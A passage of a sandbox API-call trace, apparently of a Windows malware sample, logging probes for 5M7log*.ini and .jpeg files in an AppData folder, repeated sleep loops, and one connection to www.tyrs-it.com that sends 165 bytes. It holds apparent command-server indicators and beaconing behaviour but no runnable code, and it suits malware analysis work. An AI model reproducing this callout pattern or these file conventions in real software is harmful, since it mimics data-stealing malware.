HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0195.174] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9bd0) returned 1 [0195.174] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.174] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0195.174] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0195.174] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0fb520) returned 1 [0195.174] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.174] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0195.174] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0195.174] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0fb520) returned 1 [0195.174] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtPathName=0x1302fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.174] NtCreateFile (in: FileHandle=0x1302fa50, DesiredAccess=0x120089, ObjectAttributes=0x1302fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa50*=0xffffffffffffffff, IoStatusBlock=0x1302fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0195.174] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302f9d0 | out: HeapArray=0x1302f9d0*=0x5c0000) returned 0x6 [0195.174] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0fb520) returned 1 [0195.174] Sleep (dwMilliseconds=0x7d0) [0195.176] Sleep (dwMilliseconds=0x7d0) [0195.177] Sleep (dwMilliseconds=0x7d0) [0195.179] Sleep (dwMilliseconds=0x7d0) [0195.183] Sleep (dwMilliseconds=0x7d0) [0195.185] Sleep (dwMilliseconds=0x7d0) [0195.186] Sleep (dwMilliseconds=0x7d0) [0195.188] Sleep (dwMilliseconds=0x7d0) [0195.189] Sleep (dwMilliseconds=0x7d0) [0195.190] Sleep (dwMilliseconds=0x7d0) [0195.194] Sleep (dwMilliseconds=0x7d0) [0195.196] Sleep (dwMilliseconds=0x7d0) [0195.197] Sleep (dwMilliseconds=0x7d0) [0195.200] Sleep (dwMilliseconds=0x7d0) [0195.202] Sleep (dwMilliseconds=0x7d0) [0195.207] Sleep (dwMilliseconds=0x7d0) [0195.208] Sleep (dwMilliseconds=0x7d0) [0195.210] Sleep (dwMilliseconds=0x7d0) [0195.212] Sleep (dwMilliseconds=0x7d0) [0195.215] Sleep (dwMilliseconds=0x7d0) [0195.217] Sleep (dwMilliseconds=0x7d0) [0195.218] Sleep (dwMilliseconds=0x7d0) [0195.220] Sleep (dwMilliseconds=0x7d0) [0195.221] Sleep (dwMilliseconds=0x7d0) [0195.223] Sleep (dwMilliseconds=0x7d0) [0195.224] Sleep (dwMilliseconds=0x7d0) [0195.226] Sleep (dwMilliseconds=0x7d0) [0195.227] Sleep (dwMilliseconds=0x7d0) [0195.229] Sleep (dwMilliseconds=0x7d0) [0195.230] Sleep (dwMilliseconds=0x7d0) [0195.232] Sleep (dwMilliseconds=0x7d0) [0195.233] Sleep (dwMilliseconds=0x7d0) [0195.238] Sleep (dwMilliseconds=0x7d0) [0195.239] Sleep (dwMilliseconds=0x7d0) [0195.241] Sleep (dwMilliseconds=0x7d0) [0195.243] Sleep (dwMilliseconds=0x7d0) [0195.249] Sleep (dwMilliseconds=0x7d0) [0195.257] Sleep (dwMilliseconds=0x7d0) [0195.258] Sleep (dwMilliseconds=0x7d0) [0195.264] Sleep (dwMilliseconds=0x7d0) [0195.266] Sleep (dwMilliseconds=0x7d0) [0195.268] Sleep (dwMilliseconds=0x7d0) [0195.291] Sleep (dwMilliseconds=0x7d0) [0195.293] Sleep (dwMilliseconds=0x7d0) [0195.294] Sleep (dwMilliseconds=0x7d0) [0195.296] Sleep (dwMilliseconds=0x7d0) [0195.301] Sleep (dwMilliseconds=0x7d0) [0195.302] Sleep (dwMilliseconds=0x7d0) [0195.304] Sleep (dwMilliseconds=0x7d0) [0195.305] Sleep (dwMilliseconds=0x7d0) [0195.307] Sleep (dwMilliseconds=0x7d0) [0195.318] Sleep (dwMilliseconds=0x7d0) [0195.418] Sleep (dwMilliseconds=0x7d0) [0195.466] Sleep (dwMilliseconds=0x7d0) [0196.370] Sleep (dwMilliseconds=0x7d0) [0196.386] Sleep (dwMilliseconds=0x7d0) [0196.449] Sleep (dwMilliseconds=0x7d0) [0196.549] Sleep (dwMilliseconds=0x7d0) [0196.605] Sleep (dwMilliseconds=0x7d0) [0196.658] Sleep (dwMilliseconds=0x7d0) [0196.679] Sleep (dwMilliseconds=0x7d0) [0196.716] Sleep (dwMilliseconds=0x7d0) [0196.770] Sleep (dwMilliseconds=0x7d0) [0196.884] Sleep (dwMilliseconds=0x7d0) [0196.941] Sleep (dwMilliseconds=0x7d0) [0197.048] socket (af=2, type=1, protocol=6) returned 0x1c3c [0197.050] getaddrinfo (in: pNodeName="www.tyrs-it.com", pServiceName="80", pHints=0x9e76478*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x9e764a8 | out: ppResult=0x9e764a8*=0xa05eb50*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x9f91830*(sa_family=2, sin_port=0x50, sin_addr="103.224.212.221"), ai_next=0x0)) returned 0 [0197.259] connect (s=0x1c3c, name=0x9f91830*(sa_family=2, sin_port=0x50, sin_addr="103.224.212.221"), namelen=16) returned 0 [0197.453] send (s=0x1c3c, buf=0x82e10fa*, len=165, flags=0) returned 165 [0197.455] setsockopt (s=0x1c3c, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0197.455] recv (in: s=0x1c3c, buf=0x127cf040, len=2048000, flags=0 | out: buf=0x127cf040*) returned 443 [0197.689] closesocket (s=0x1c3c) returned 0 [0197.691] Sleep (dwMilliseconds=0x7d0) [0197.696] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtPathName=0x1302fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.696] NtCreateFile (in: FileHandle=0x1302fac0, DesiredAccess=0x120089, ObjectAttributes=0x1302fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7log00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fac0*=0xffffffffffffffff, IoStatusBlock=0x1302fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0197.699] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa40 | out: HeapArray=0x1302fa40*=0x5c0000) returned 0x6 [0197.699] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f6390) returned 1 [0197.699] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.699] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0197.699] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0197.699] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f6390) returned 1 [0197.699] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.700] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0197.700] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0197.700] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f6390) returned 1 [0197.700] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.700] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0197.700] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0197.700] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f71a0) returned 1 [0197.700] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.700] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0197.700] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0197.700] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f6390) returned 1 [0197.700] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.700] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0197.701] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0197.701] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f6ed0) returned 1 [0197.701] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.701] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0197.701] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0197.701] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f6ed0) returned 1 [0197.701] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.701] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0197.701] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0197.701] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f6390) returned 1 [0197.701] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.701] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0197.702] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0197.702] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f6390) returned 1 [0197.702] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.702] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0197.702] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0197.702] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f6390) returned 1 [0197.702] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtPathName=0x1302fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.702] NtCreateFile (in: FileHandle=0x1302fa50, DesiredAccess=0x120089, ObjectAttributes=0x1302fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa50*=0xffffffffffffffff, IoStatusBlock=0x1302fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0197.702] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302f9d0 | out: HeapArray=0x1302f9d0*=0x5c0000) returned 0x6 [0197.702] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f6390) returned 1 [0197.702] Sleep (dwMilliseconds=0x7d0) [0197.704] Sleep (dwMilliseconds=0x7d0) [0197.707] Sleep (dwMilliseconds=0x7d0) [0197.709] Sleep (dwMilliseconds=0x7d0) [0197.710] Sleep (dwMilliseconds=0x7d0) [0197.712] Sleep (dwMilliseconds=0x7d0) [0197.713] Sleep (dwMilliseconds=0x7d0) [0197.715] Sleep (dwMilliseconds=0x7d0) [0197.716] Sleep (dwMilliseconds=0x7d0) [0197.718] Sleep (dwMilliseconds=0x7d0) [0197.720] Sleep (dwMilliseconds=0x7d0) [0197.721] Sleep (dwMilliseconds=0x7d0) [0197.722] Sleep (dwMilliseconds=0x7d0) [0197.724] Sleep (dwMilliseconds=0x7d0) [0197.725] Sleep (dwMilliseconds=0x7d0) [0197.728] Sleep (dwMilliseconds=0x7d0) [0197.730] Sleep (dwMilliseconds=0x7d0) [0197.732] Sleep (dwMilliseconds=0x7d0) [0197.733] Sleep (dwMilliseconds=0x7d0) [0197.734] Sleep (dwMilliseconds=0x7d0) [0197.736] Sleep (dwMilliseconds=0x7d0) [0197.739] Sleep (dwMilliseconds=0x7d0) [0197.741] Sleep (dwMilliseconds=0x7d0) [0197.742] Sleep (dwMilliseconds=0x7d0) [0197.744] Sleep (dwMilliseconds=0x7d0) [0197.745] Sleep (dwMilliseconds=0x7d0) [0197.747] Sleep (dwMilliseconds=0x7d0) [0197.750] Sleep (dwMilliseconds=0x7d0) [0197.752] Sleep (dwMilliseconds=0x7d0) [0197.755] Sleep (dwMilliseconds=0x7d0) [0197.757] Sleep (dwMilliseconds=0x7d0) [0197.759] Sleep (dwMilliseconds=0x7d0) [0197.760] Sleep (dwMilliseconds=0x7d0) [0197.761] Sleep (dwMilliseconds=0x7d0) [0197.763] Sleep (dwMilliseconds=0x7d0) [0197.764] Sleep (dwMilliseconds=0x7d0) [0197.766] Sleep (dwMilliseconds=0x7d0) [0197.767] Sleep (dwMilliseconds=0x7d0) [0197.769] Sleep (dwMilliseconds=0x7d0) [0197.771] Sleep (dwMilliseconds=0x7d0) [0197.773] Sleep (dwMilliseconds=0x7d0) [0197.774] Sleep (dwMilliseconds=0x7d0) [0197.776] Sleep (dwMilliseconds=0x7d0) [0197.777] Sleep (dwMilliseconds=0x7d0) [0197.778] Sleep (dwMilliseconds=0x7d0) [0197.780] Sleep (dwMilliseconds=0x7d0) [0197.782] Sleep (dwMilliseconds=0x7d0) [0197.784] Sleep (dwMilliseconds=0x7d0) [0197.786] Sleep (dwMilliseconds=0x7d0) [0197.787] Sleep (dwMilliseconds=0x7d0) [0197.789] Sleep (dwMilliseconds=0x7d0) [0197.790] Sleep (dwMilliseconds=0x7d0) [0197.792] Sleep (dwMilliseconds=0x7d0) [0197.794] Sleep (dwMilliseconds=0x7d0) [0197.796] Sleep (dwMilliseconds=0x7d0) [0197.798] Sleep (dwMilliseconds=0x7d0) [0197.799] Sleep (dwMilliseconds=0x7d0) [0197.801] Sleep (dwMilliseconds=0x7d0) [0197.802] Sleep (dwMilliseconds=0x7d0) [0197.804] Sleep (dwMilliseconds=0x7d0) [0197.805] Sleep (dwMilliseconds=0x7d0) [0197.807] Sleep (dwMilliseconds=0x7d0) [0197.808] Sleep (dwMilliseconds=0x7d0) [0197.810] Sleep (dwMilliseconds=0x7d0) [0197.811] Sleep (dwMilliseconds=0x7d0) [0197.813] Sleep (dwMilliseconds=0x7d0) [0197.815] Sleep (dwMilliseconds=0x7d0) [0197.818] Sleep (dwMilliseconds=0x7d0) [0197.819] Sleep (dwMilliseconds=0x7d0) [0197.821] Sleep (dwMilliseconds=0x7d0) [0197.822] Sleep (dwMilliseconds=0x7d0) [0197.824] Sleep (dwMilliseconds=0x7d0) [0197.826] Sleep (dwMilliseconds=0x7d0) [0197.828] Sleep (dwMilliseconds=0x7d0) [0197.830] Sleep (dwMilliseconds=0x7d0) [0197.831] Sleep 